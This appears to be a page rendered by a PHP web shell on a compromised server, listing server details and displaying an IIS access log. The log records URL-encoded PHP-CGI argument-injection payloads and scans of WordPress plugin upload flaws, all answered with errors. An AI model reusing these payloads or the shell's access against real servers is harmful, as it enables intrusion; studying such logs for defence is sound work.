KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Apache/2.4.62
System : FreeBSD fbsdweb2.web.rcn.net 14.1-RELEASE FreeBSD 14.1-RELEASE releng/14.1-n267679-10e31f0946d8 GENERIC amd64
User : www ( 80)
PHP Version : 8.3.8
Disable Function : NONE
Directory :  /domains/clarkweb/logs/W2K3WEB1/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /domains/clarkweb/logs/W2K3WEB1/ex180107.log
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2018-01-07 09:25:39
#Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs-version cs(User-Agent) cs(Cookie) cs(Referer) sc-status sc-win32-status sc-bytes cs-bytes time-taken 
2018-01-07 09:25:39 W3SVC544 W2K3WEB1 192.168.25.10 POST /Default.htm %2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/56.0.2924.87+Safari/537.36 - - 405 0 1822 1000 15
2018-01-07 09:25:39 W3SVC544 W2K3WEB1 192.168.25.10 POST /cgi-bin/php %2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/56.0.2924.87+Safari/537.36 - - 404 3 1850 1011 0
2018-01-07 09:25:40 W3SVC544 W2K3WEB1 192.168.25.10 POST /cgi-bin/php5 %2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/56.0.2924.87+Safari/537.36 - - 404 3 1850 1012 0
2018-01-07 09:25:40 W3SVC544 W2K3WEB1 192.168.25.10 POST /cgi-bin/php4 %2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/56.0.2924.87+Safari/537.36 - - 404 3 1850 1012 0
2018-01-07 09:25:42 W3SVC544 W2K3WEB1 192.168.25.10 POST /cgi-bin/php-cgi %2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/56.0.2924.87+Safari/537.36 - - 404 3 1850 1015 0
2018-01-07 09:25:42 W3SVC544 W2K3WEB1 192.168.25.10 POST /cgi-bin/php.cgi %2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/56.0.2924.87+Safari/537.36 - - 404 3 1850 1015 0
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2018-01-07 09:58:55
#Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs-version cs(User-Agent) cs(Cookie) cs(Referer) sc-status sc-win32-status sc-bytes cs-bytes time-taken 
2018-01-07 09:58:55 W3SVC544 W2K3WEB1 192.168.25.10 GET /Default.htm - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.120+Safari/537.36 - http://burger-imperia.com/ 200 0 928 280 109
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2018-01-07 10:19:06
#Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs-version cs(User-Agent) cs(Cookie) cs(Referer) sc-status sc-win32-status sc-bytes cs-bytes time-taken 
2018-01-07 10:19:06 W3SVC544 W2K3WEB1 192.168.25.10 POST /wp-admin/admin-ajax.php - 80 - 192.168.25.52 HTTP/1.1 SeaMonkey/9.5+(Conectiva+(Mandriva)+6.6;+hr_HR;) - - 404 3 1850 1130 15
2018-01-07 10:19:09 W3SVC544 W2K3WEB1 192.168.25.10 POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php - 80 - 192.168.25.52 HTTP/1.1 SeaMonkey/11.1+(Debian+Linux+5.5;+en_CA;) - - 404 3 1850 745 0
2018-01-07 10:19:09 W3SVC544 W2K3WEB1 192.168.25.10 POST /wp-admin/admin-post.php - 80 - 192.168.25.52 HTTP/1.1 Mobile/2.3+(Macintosh+1.3;+ar_JO;) - - 404 3 1869 550 0
2018-01-07 10:19:11 W3SVC544 W2K3WEB1 192.168.25.10 POST /wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php Year=2018&Month=01 80 - 192.168.25.52 HTTP/1.1 Maxthon/17.17+(AmigaOS+5.8;+en_SG;) - - 404 3 1850 698 0
2018-01-07 10:19:11 W3SVC544 W2K3WEB1 192.168.25.10 POST /wp-content/plugins/contus-hd-flv-player/uploadVideo.php - 80 - 192.168.25.52 HTTP/1.1 Internet+Explorer/7.0+(Windows+NT+5.0;+ar_LB;) - - 404 3 1850 669 0
2018-01-07 10:19:11 W3SVC544 W2K3WEB1 192.168.25.10 POST /wp-admin/admin-ajax.php action=load_ajax_function 80 - 192.168.25.52 HTTP/1.1 Chrome/4.19+(Macintosh+2.5;+be;) - - 404 3 1850 603 0
2018-01-07 10:19:12 W3SVC544 W2K3WEB1 192.168.25.10 POST /wp-content/plugins/gallery-plugin/upload/php.php - 80 - 192.168.25.52 HTTP/1.1 SeaMonkey/14.5+(BackTrack+Linux+3.6;+zh_CN;) - - 404 3 1850 572 0
2018-01-07 10:19:19 W3SVC544 W2K3WEB1 192.168.25.10 POST /wp-content/plugins/simple-dropbox-upload-form/dragup/ - 80 - 192.168.25.52 HTTP/1.1 Mobile/17.4+(Damn+Small+Linux+4.5;+en_NZ;) - - 404 3 1850 403 0
2018-01-07 10:19:22 W3SVC544 W2K3WEB1 192.168.25.10 POST /modules/pk_vertflexmenu/ajax/upload.php - 80 - 192.168.25.52 HTTP/1.0 SeaMonkey/13.0+(iPad+5.3;+ca;) - - 404 3 1869 495 0
2018-01-07 10:19:24 W3SVC544 W2K3WEB1 192.168.25.10 POST /wp-content/plugins/wpstorecart/php/upload.php - 80 - 192.168.25.52 HTTP/1.0 IBrowse/20.8+(Windows+95+5.3;+ar_AE;) - - 404 3 1869 507 0
2018-01-07 10:20:34 W3SVC544 W2K3WEB1 192.168.25.10 GET /wp-content/plugins/uploader/uploadify/uploadify.php - 80 - 192.168.25.52 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0) - - 404 3 1850 215 15
2018-01-07 10:21:06 W3SVC544 W2K3WEB1 192.168.25.10 GET /modules/pk_vertflexmenu/uploads/WTIf8.php - 80 - 192.168.25.52 HTTP/1.1 Firefox/20.4+(BackTrack+Linux+3.8;+ar_EG;) - - 404 3 1850 230 0
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2018-01-07 11:20:24
#Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs-version cs(User-Agent) cs(Cookie) cs(Referer) sc-status sc-win32-status sc-bytes cs-bytes time-taken 
2018-01-07 11:20:24 W3SVC544 W2K3WEB1 192.168.25.10 POST /wp-content/plugins/dzs-portfolio/upload.php - 80 - 192.168.25.52 HTTP/1.1 Konqueror/5.19+(Windows+NT+3.7;+zh_HK;) - - 404 3 1850 510 15
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2018-01-07 12:07:40
#Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs-version cs(User-Agent) cs(Cookie) cs(Referer) sc-status sc-win32-status sc-bytes cs-bytes time-taken 
2018-01-07 12:07:40 W3SVC544 W2K3WEB1 192.168.25.10 GET /wp-admin/ - 80 - 192.168.25.52 HTTP/1.0 Mozilla/5.0+(Windows+NT+10.0;+WOW64;+rv:56.0)+Gecko/20100101+Firefox/56.0 - - 404 2 1874 335 15
2018-01-07 12:07:40 W3SVC544 W2K3WEB1 192.168.25.10 GET /wp-login.php - 80 - 192.168.25.52 HTTP/1.0 Mozilla/5.0+(Windows+NT+10.0;+WOW64;+rv:56.0)+Gecko/20100101+Firefox/56.0 - - 404 2 1874 338 0
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2018-01-07 12:32:12
#Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs-version cs(User-Agent) cs(Cookie) cs(Referer) sc-status sc-win32-status sc-bytes cs-bytes time-taken 
2018-01-07 12:32:12 W3SVC544 W2K3WEB1 192.168.25.10 GET /MSQYm/ - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.120+Safari/537.36 - http://pizza-tycoon.com/ 404 2 1850 286 0
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2018-01-07 16:22:38
#Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs-version cs(User-Agent) cs(Cookie) cs(Referer) sc-status sc-win32-status sc-bytes cs-bytes time-taken 
2018-01-07 16:22:37 W3SVC544 W2K3WEB1 192.168.25.10 GET /Default.htm - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html) - - 200 0 947 256 0
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2018-01-07 22:51:35
#Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs-version cs(User-Agent) cs(Cookie) cs(Referer) sc-status sc-win32-status sc-bytes cs-bytes time-taken 
2018-01-07 22:51:35 W3SVC544 W2K3WEB1 192.168.25.10 GET /Default.htm - 80 - 192.168.25.52 HTTP/1.1 Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html) - - 200 0 947 294 15

Anon7 - 2021